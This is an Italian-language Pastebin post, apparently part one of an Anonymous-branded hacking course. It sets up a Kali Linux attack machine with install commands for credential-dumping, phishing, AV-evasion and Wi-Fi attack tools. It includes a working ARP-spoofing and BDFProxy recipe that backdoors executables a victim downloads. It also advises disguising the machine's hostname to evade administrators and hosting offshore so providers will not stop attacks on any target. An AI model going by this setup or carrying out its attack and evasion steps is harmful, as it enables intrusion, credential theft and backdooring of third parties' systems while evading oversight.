Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /$$
- /$$$$
- |_ $$
- | $$
- | $$
- | $$
- /$$$$$$
- |______/tools&&start
- ,##. ,==.
- ,# #. \ o ',
- # # _ _ \ \
- # # (_) (_) / ;
- `# #' / .'
- `##' "=="
- iniziamo questo corso veloce con lista di programmi di cui abbiamo bisogno e che non sempre sono inclusi o che vanno modificati per la nostra penbox.
- ---------------------
- Recon/scanning Tools
- ---------------------
- Discover
- eyewitness
- HTTPScreenShot
- WMAP
- SpiderFoot
- Masscan
- Gitrob
- CMSmap
- Recon-ng
- SPARTA
- WPScan
- PasswordLists
- -------------------
- Explitation
- -------------------
- Burp Suite Pro
- ZAP Proxy Pro
- NoSQLMap
- SQLMAP
- SQLNinja
- BeEF Exploitation Framework
- Responder
- Printer Exploits
- Veil
- WIFIPhisher
- Wifite
- SET
- -------------------
- Post Exploitation
- -------------------
- SMBexec
- Veil
- WCE
- Mimikatz
- PowerSploit
- Nishang
- The Backdoor Factory
- DSHashes
- Net-Creds
- ,##. ,==.
- ,# #. \ o ',
- # # _ _ \ \
- # # (_) (_) / ;
- `# #' / .'
- `##' "=="
- Settare Kaly linux
- ci sono diverse strade che si possono seguire per organizzare la nostra macchina, ma per seguire tutti gli esempi che potrei riportare da qui in avanti vi consiglio di seguire queste piccole modifiche hai settings.
- per mia comodità seguiremo la struttura e gli script contenuti in un libro che ho trovato molto interessante tempo fà (www.thehackerplaybook.com) potete trovare anche le varie opzioni e i software qui: www.github.com/cheetz/thp2
- potrebbe semplificarvi l'iserimento dei vari comandi :) ctrl-c/ctrl-z...
- dato che ci baseremo, e per questo seguiamo questo libro, su kali linux, os più utilizzato da quelli che si affacciano per la prima volta su questo universo. potete scaricarlo qui:
- www.kali.org/downloads.
- vi consiglio caldamente di scaricare l'immaggine VMWARE e scaricare VirtualPlayer/VirtualBox.
- Dopo che la vostra macchian virtuale KaliLinux sarà avviata correttamente:
- -log in: nome utente root/pass toor (default)
- -aprite il terminale
- -cambiate password (passwd)
- -aggiornate il sistema (apt-get update && apt-get dist-upgrade)
- -caricate il Database(DB) di Metasploit (service postgresql enable)
- -Start e Stop (service metasploit start/service metasploit stop)
- il servizio metasploit, creerà per voi database.yml(If you are using Kali 2.0, they have removed Metasploit Community/Pro from their image (https://www.kali.org/releases/kali-linux-20-released/). Therefore, they do not have a service called metasploit anymore.
- In the book's setup phase, there is a section about having to start and stop the metasploit service to build the db (service metasploit start). Instead of this command, just run: msfdb init. That will build the database) per voi.
- -Installate gedit (apt-get install gedit)
- -Cambiate l'hostname della vostra macchiana- settatene uno "standard" per la compagnia che andrete a testare ;) molti admin cheranco Kali nei log come DHCP
- (gedit /etc/hostname)
- -cambiate l'hostname (cambiate kali) e salvate
- (gedit /etc/hosts)
- -cambiate l'hostname (cambiate kali) e salvate
- (reboot)
- opzionalmente abilitate i log di metasploit, i log potrebbero diventare enormi, ma avreste la possibilità di loggare ogni comando. potrebbe diventare molto utile nel caso di "bulk Attack/queries" o nel caso sentiate il bisogno di condividerli.
- Se è stato appena installato msf scrivete per prima cosa eseguite -msfconsole, ed uscite così da costruire la cartella .msf4.
- da consolele digitate:
- echo "spool/root/msf_console.log">/root/.msf4/msfconsole.rc
- i log saranno conservati in /root/msfconsole.log
- In the new version of Kali 2.0, I think the msfconsole.rc was moved from /root/.msf4/msfconsole.rc to /root/.msf5/msfconsole.rc. To configure Metasploit command logging, use the command: echo "spool /root/msf_console.log" > /root/.msf5/msfconsole.rc
- ********************
- As Kali 2.0 broke some tools, I've been trying to find fixes for what I can. The Discover module had goofile broken with the update. To fix this issue in Kali 2.0, run the following commands:
- wget "https://goofile.googlecode.com/files/goofilev1.5.zip"
- unzip -p goofilev1.5.zip goofilev1.5/goofile.py > /usr/bin/goofile && chmod +x /usr/bin/goofile
- Also, I noticed Discover changed their installation script. In the PREGAME - THE SETUP.
- OLD:
- git clone https://github.com/leebaird/discover.git /opt/discover
- cd /opt/discover && ./setup.sh
- NEW:
- git clone https://github.com/leebaird/discover.git /opt/discover
- cd /opt/discover && ./update.sh
- Discover Tool - Passive Scan
- ,##. ,==.
- ,# #. \ o ',
- # # _ _ \ \
- # # (_) (_) / ;
- `# #' / .'
- `##' "=="
- OpenVAS fix kali2.0
- Looks like a few small changes with Kali 2 on the Setup Phase.
- Create Account (instead of openvas-adduser):
- openvasmd --user=admin --new-password=admin
- Login (instead of gsd):
- Go to the browser to: https://127.0.0.1:9392
- ,##. ,==.
- ,# #. \ o ',
- # # _ _ \ \
- # # (_) (_) / ;
- `# #' / .'
- `##' "=="
- ________________________________________________________
- _ TOOL INSTALLATION _
- _________________________list___________________________
- The Backdoor Factory
- Patch PE, ELF, MAch-O binari con codici shell...
- git clone https://github.com/secretsquirrel/the-backdoor-factory /opt/the-backdoor-factory
- cd the-backdoor-factory
- ./install
- FIX:
- was missing a configuration setting for the BackDoor Factory Proxy (BDFProxy). Make sure in the configuration to modify transparentProxy = transparent. Here's what the full installing and implementation on a fresh Kali image will look like:
- apt-get update
- apt-get install bdfproxy
- apt-get install mitmproxy
- apt-get install python-openssl
- apt-get install openssl
- Modify the Config:
- vi /etc/bdfproxy/bdfproxy.cfg
- Change all HOST IPs to your Kali IP
- Change transparentProxy = transparent
- Start BDFProxy:
- bdfproxy
- Start the Meterpreter Resource File:
- msfconsole -r /usr/share/bdfproxy/bdfproxy_msf_resource.rc
- Arp Stuff:
- sysctl -w net.inet.ip_forwarding=1
- iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080
- arpspoof -i eth0 -t victim-ip gateway-ip
- arpspoof -i eth0 -t gateway-ip victim-ip
- And you should be all set. Give it a try by downloading and executing a 32 bit version of Winrar (example: http://www.rarlab.com/rar/wrar521.exe) from your victim host. Watch the shells fall from the sky!
- Thanks Joseph from Canada!
- BackDoor Factory Installation
- In the tools installation page, there is a directory folder missing for The Backdoor Factory. Replace:
- cd the-backdoor-factory
- with:
- cd /opt/the-backdoor-factory
- ,##. ,==.
- ,# #. \ o ',
- # # _ _ \ \
- # # (_) (_) / ;
- `# #' / .'
- `##' "=="
- HTTPScreenShot
- HTTPScreenshot è un programma che ci permetterà di prendere screenshot e il codice html di molti siti web
- pip install selenium
- git clone https://github.com/breenmachine/httpscreenshot.git /opt/httpscreenshot
- cd /opt/httpscreenshot
- chmao XD +x install-dependencies.sh && ./install-dependencies.sh
- httpscreenshot funzionerà solo se avete kali 64 bit, se avete la 32 bit installate i686 phantomjs così:
- wget https://bitbucket.org/ariya/phantomjs/downloads/phantomjs-1.9.8-linux-i686.tar.bz2
- bzip2 -d phantomjs-1.9.8-linux-i686.tar.bz2
- tar xvf phantomjs-1.9.8-linux-i686.tar
- cp phantomjs-1.9.8-linux-i686/bin/phantomjs/usr/bin
- (controllate ogni link sul libro ufficiale)
- ,##. ,==.
- ,# #. \ o ',
- # # _ _ \ \
- # # (_) (_) / ;
- `# #' / .'
- `##' "=="
- SMBExec
- un veloce stile di attacco tramite gli strumenti samba
- git clone https://github.com/pentestgeek/smbexec.git /opt/smbexec
- cd /opt/smbexec && ./install.sh
- selezionate 1 - debian/ubuntu and derivates
- selezionate il resto come default
- ./install.sh
- selezionate 4 per compilare i smbexec binaries
- finita la compilazione selezionate 5 per uscire
- ,##. ,==.
- ,# #. \ o ',
- # # _ _ \ \
- # # (_) (_) / ;
- `# #' / .'
- `##' "=="
- Masscan(controllate ogni link sul libro ufficiale)
- il più veloce in assoluto portscanner, potrebbe scannerizzare tutta la net in meno di 6 minuti :D
- apt-get install git gcc make libcap-dev
- git clone https://github.com/robertdavidgraham/masscan.git /opt/masscan
- cd /opt/masscan
- make
- make install
- ,##. ,==.
- ,# #. \ o ',
- # # _ _ \ \
- # # (_) (_) / ;
- `# #' / .'
- `##' "=="
- Gitrob
- cerca materiale su github
- git clone https://github.com/michenriksen/gitrob.git /opt/gitrob
- gem install bundler
- service postgresql start
- su postgres
- createuser -s gitrov --pwprompt
- createdb -O gitrob gitrob
- exit
- cd /opt/gitrob/bin
- gem install gitrob
- *Tiny change configuring GitRob. When running the command: ./gitrob --configure, they now specify the database port. For postgres use port: 5432:
- ,##. ,==.
- ,# #. \ o ',
- # # _ _ \ \
- # # (_) (_) / ;
- `# #' / .'
- `##' "=="
- CMsmap
- un programma .py CMS(contentmanagmentsystem)
- scanner che ci aiuta a individare vuln.
- git clone https://github.com/Dionach/CMSmap /opt/CMSmap
- ,##. ,==.
- ,# #. \ o ',
- # # _ _ \ \
- # # (_) (_) / ;
- `# #' / .'
- `##' "=="
- WPScan
- wordpress vuln scanner e sistema di bruteforce
- git clone https://github.com/wpscanteam/wpscan.git /opt/wpscan
- cd /opt/wpscan && ./wscan.rb --update
- ,##. ,==.
- ,# #. \ o ',
- # # _ _ \ \
- # # (_) (_) / ;
- `# #' / .'
- `##' "=="
- Eyewitness
- è scritto epr catturare screenshot dai siti web. osservare alcune server header info e cerca se possibile di identificare le credenziali di default
- git clone https://github.com/ChrisTruncer/EyeWitness.git /opt/EyeWitness
- ,##. ,==.
- ,# #. \ o ',
- # # _ _ \ \
- # # (_) (_) / ;
- `# #' / .'
- `##' "=="
- Printer ExPloits(controllate ogni link sul libro ufficiale)
- contiene un tot di exploit
- git clone https://github.com/MooseDojo/praedasploit /opt/praedasploit
- ,##. ,==.
- ,# #. \ o ',
- # # _ _ \ \
- # # (_) (_) / ;
- `# #' / .'
- `##' "=="
- SQLMap
- softwware per sqlinjection
- git clone https://github.com/sqlmapproject/sqlmap /opt/sqlmap
- ,##. ,==.
- ,# #. \ o ',
- # # _ _ \ \
- # # (_) (_) / ;
- `# #' / .'
- `##' "=="
- Recon-ng
- Un bellissimo tool di ricognizione .py
- git clone https://bitbucket.org/LaNMaSteR53/recon-ng.git /opt/recon-ng
- Looks like Kali 2.0 broke Recon-NG. If you get the following error "Module 'recon/domains-contacts/metacrawler' disabled. Dependency required: 'PyPDF2'" in Kali 2.0, run the following commands:
- pip install PyPDF2
- pip install olefile
- ,##. ,==.
- ,# #. \ o ',
- # # _ _ \ \
- # # (_) (_) / ;
- `# #' / .'
- `##' "=="
- Discover Scripts(controllate ogni link sul libro ufficiale)
- bash script che possono essere utilizzati per automatizzare diversi processi di pentest
- git clone https://github.com/leebaird/discover.git /opt/discover
- cd /opt/discover && ./setup.sh
- ,##. ,==.
- ,# #. \ o ',
- # # _ _ \ \
- # # (_) (_) / ;
- `# #' / .'
- `##' "=="
- BeEF Exploitation Framework
- piattaforma d'attacco Cross-Site scripting
- cd /opt/
- wget https://raw.github.com/beefproject/beef/a6a7536e/install-beef
- chmod +x install-beef
- ./install-beef
- ,##. ,==.
- ,# #. \ o ',
- # # _ _ \ \
- # # (_) (_) / ;
- `# #' / .'
- `##' "=="
- Responder
- LLMNR, NBT-NS e MDNS poisoner, con già dentro HTTP/SMB/MSSQL/FTP/LDAP rogue server authetication supporting NTLMv1/NTLMv2/LMv2 (vi invito a capire cosa c'è scritto in questa frase molto attentamente come sto facendo io XD)
- Extended Security NTLMSSP and basic HTTP authentication.
- Responder sarà utilizzato per ottenere NTLM Chalenge/response hashes
- git clone https://github.com/SpiderLabs/Responder.git /opt/Responder
- ,##. ,==.
- ,# #. \ o ',
- # # _ _ \ \
- # # (_) (_) / ;
- `# #' / .'
- `##' "=="
- Custom Script
- scritti dall'autore del libro che seguiamo come detto all'inizio e che ci saranno utili nei passi successivi, e in altri ambiti ;)
- (controllate ogni link sul libro ufficiale)
- git clone https://github.com/cheetz/Easy-P.git /opt/Easy-P
- git clone https://github.com/cheetz/Password_Plus_One /opt/Password_Plus_One
- git clone https://github.com/cheetz/PowerShell_Popup /opt/PowerShell_Popup
- git clone https://github.com/cheetz/icmshock /opt/icmpshock
- git clone https://github.com/cheetz/brutescrape /opt/brutescrape
- git clone https://github.com/cheetz/reddit_xss /opt/reddit_xss
- ,##. ,==.
- ,# #. \ o ',
- # # _ _ \ \
- # # (_) (_) / ;
- `# #' / .'
- `##' "=="
- Forked Version di PowerSploit e powertools usati dopo.(controllate ogni link sul libro ufficiale)
- git clone https://github.com/cheetz/PowerSploit /opt/HP_PowerSploit
- git clone https://github.com/cheetz/PowerTools /opt/HP_PowerTools
- git clone https://github.com/cheetz/nishang /opt/nishang
- ,##. ,==.
- ,# #. \ o ',
- # # _ _ \ \
- # # (_) (_) / ;
- `# #' / .'
- `##' "=="
- DSHashes
- estrae le hash degli user in un formato comprensibile per NTDSXtract
- wget https://storage.googleapis.com/google-code-archive-source/v2/code.google.com/ptscripts/source-archive.zip -O /opt/NTDSXtract/dshashes.py
- ,##. ,==.
- ,# #. \ o ',
- # # _ _ \ \
- # # (_) (_) / ;
- `# #' / .'
- `##' "=="
- SParta Gui
- semplifica la penetrazione 8::::D di strutture network aiutandovi durante lo scan e l'enumerazione.
- git clone https://github.com/secforce/sparta.git /opt/sparta
- apt-get install python-elixir
- apt-get install ldap-utils rwho rsh-client x11-apps finger
- ,##. ,==.
- ,# #. \ o ',
- # # _ _ \ \
- # # (_) (_) / ;
- `# #' / .'
- `##' "=="
- NOSQLMap
- MongoDB database server e web aplication
- git clone https://github.com/tcstool/NoSQLMap.git /opt/NoSQLMap
- ,##. ,==.
- ,# #. \ o ',
- # # _ _ \ \
- # # (_) (_) / ;
- `# #' / .'
- `##' "=="
- Spiderfoot
- FootPrinting Tool
- mkdir /opt/spiderfoot/ && cd /opt/spiderfoot
- wget "http://sourceforge.net/projects/spiderfoot/files/spiderfoot-2.3.0-src.tar.gz"
- tar xzvf spiderfoot-2.3.0-src.tar.gz
- pip install lxml
- pip install netaddr
- pip install M2Crypto
- pip install cherrypy
- pip install mako
- ,##. ,==.
- ,# #. \ o ',
- # # _ _ \ \
- # # (_) (_) / ;
- `# #' / .'
- `##' "=="
- WCE
- Windows credential editor (WCE) èusato per tirare fuori le pass dalla memoria
- wget www.ampliasecurity.com/research/wce_v1_4beta_universal.zip
- mkdir /opt/wce && unzip wce_v1* -d /opt/wce && rm wce_v1*.zip
- ,##. ,==.
- ,# #. \ o ',
- # # _ _ \ \
- # # (_) (_) / ;
- `# #' / .'
- `##' "=="
- Mimikatz
- è usato per tirare fuori dalla memoria:
- cleartext passwords,Goldenticket,skeleton key e molto altro
- https://github.com/gentilkiwi/mimikatz/relases/latest
- ,##. ,==.
- ,# #. \ o ',
- # # _ _ \ \
- # # (_) (_) / ;
- `# #' / .'
- `##' "=="
- SET
- Social Engineering Toolkit molto utile ne phishing
- git clone https://github.com/trustedsec/social-engineer-toolkit/ /opt/set/
- cd /opt/set && ./setup.py install
- ,##. ,==.
- ,# #. \ o ',
- # # _ _ \ \
- # # (_) (_) / ;
- `# #' / .'
- `##' "=="
- PowerSploit
- PowerShell scripts per il post ecploitation
- git clone https://github.com/mattifestation/PowerSploit.git /opt/PowerSploit
- cd /opt/PowerSploit && wget https://raw.githubuserconetent.com/obscuresec/random/master/StartListener.py $$ wget https://raw.githubusercontent.com/darkoperator/powershell_scripts/master/ps_ecoder.py
- ,##. ,==.
- ,# #. \ o ',
- # # _ _ \ \
- # # (_) (_) / ;
- `# #' / .'
- `##' "=="
- Nishang (PowerShell)
- collezione di script per exploitare e post exploit
- git clone https://github.com/samratashock/nishang /opt/nishang
- ,##. ,==.
- ,# #. \ o ',
- # # _ _ \ \
- # # (_) (_) / ;
- `# #' / .'
- `##' "=="
- Veil-Framework
- toolkit concetranto sull'evadere la detection rate, contiene Veil-Evasion che genera AV-evading payloads, Veil-Catapult per inviarle al targhet, Veil-PowerView per raggiungere determinati traguardi su domini windows
- può essere unsato per creare un Meterprete su base .py eseguibile
- git clone https://github.com/Veil-Framework/Veil /opt/Veil
- cd /opt/Veil/ $$ ./install.sh -c
- ,##. ,==.
- ,# #. \ o ',
- # # _ _ \ \
- # # (_) (_) / ;
- `# #' / .'
- `##' "=="
- Burp Suite Pro
- Web Pentest tool
- http://portswigger.net/burp/proxy.html
- il top sarebbe ottenere la versione professionale, $299 XD
- ,##. ,==.
- ,# #. \ o ',
- # # _ _ \ \
- # # (_) (_) / ;
- `# #' / .'
- `##' "=="
- ZAP PROXY PRO
- OWASP ZAP pentest per scoprere vuln nelle applicazioni web
- https://code.google.com/p/zaproxy/wiki/Downloads?tm=2
- ,##. ,==.
- ,# #. \ o ',
- # # _ _ \ \
- # # (_) (_) / ;
- `# #' / .'
- `##' "=="
- Fuzzing list
- script da usare con Burp per fuzzare parametri
- git clone https://github.com/danielmiessler/SecLists.git /opt/SecLists
- ,##. ,==.
- ,# #. \ o ',
- # # _ _ \ \
- # # (_) (_) / ;
- `# #' / .'
- `##' "=="
- Passwordlist
- Le implemeterò più avanti
- ,##. ,==.
- ,# #. \ o ',
- # # _ _ \ \
- # # (_) (_) / ;
- `# #' / .'
- `##' "=="
- Net-Creds Network Parsing
- analizzare i file PCAP per nomeutente/password
- git clone https://github.com/DanMcInerney/net-creds.git /opt/net-creds
- ,##. ,==.
- ,# #. \ o ',
- # # _ _ \ \
- # # (_) (_) / ;
- `# #' / .'
- `##' "=="
- Firefox addons
- web developer add-on
- https://addons.mozilla.org/en-US/firefox/addon/web-developer/
- temper data
- https://addons.mozzilla.org/en-US/firefox/addon/foxyproxy-standard/
- User Agent Switcher
- https://addons.mozzilla.org/en-US/firefox/addon/user-agent-switcher/
- ,##. ,==.
- ,# #. \ o ',
- # # _ _ \ \
- # # (_) (_) / ;
- `# #' / .'
- `##' "=="
- Wifite
- attacchi alle reti wifie
- git clone https://github.com/derv82/wifite /opt/wifite
- ,##. ,==.
- ,# #. \ o ',
- # # _ _ \ \
- # # (_) (_) / ;
- `# #' / .'
- `##' "=="
- WIFIPhisher
- Phishing su reti wifie
- git clone https://github.com/sophron/wifiphisher.git /opt/wifiphisher
- ,##. ,==.
- ,# #. \ o ',
- # # _ _ \ \
- # # (_) (_) / ;
- `# #' / .'
- `##' "=="
- Phishinf-Frenzy
- git clone https://github.com/pentestgeek/phishing-frenzy.git /var/www/phishing-frenzy
- ,##. ,==.
- ,# #. \ o ',
- # # _ _ \ \
- # # (_) (_) / ;
- `# #' / .'
- `##' "=="
- extra
- git clone https://github.com/macubergeek/gitlist.git /opt/gitlist
- ,##. ,==.
- ,# #. \ o ',
- # # _ _ \ \
- # # (_) (_) / ;
- `# #' / .'
- `##' "=="
- consiglio a tutti di hostare la vostra macchian da pentest offshore
- su un hosting "fidato" che non vi chiuda ir ubinetti qualunque obbiettivo voi vi poniate difronte.
- un vps potrebbe non bastare.
- ,##. ,==.
- ,# #. \ o ',
- # # _ _ \ \
- # # (_) (_) / ;
- `# #' / .'
- `##' "=="
- CHECK KALI SOFTWARE alredy installed, controllate la fonte tramite la quale vi potrebbe arrivare questa 1° parte di guida, controllate ogni link manuamente prima di inviare il comando, spero di esservi utile a continuare la lotta
- Anoymous non dimentica
- Anonymous non perdona
- Anonymous DOCET!
- parte 2 Attacchi OSINT ---->
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement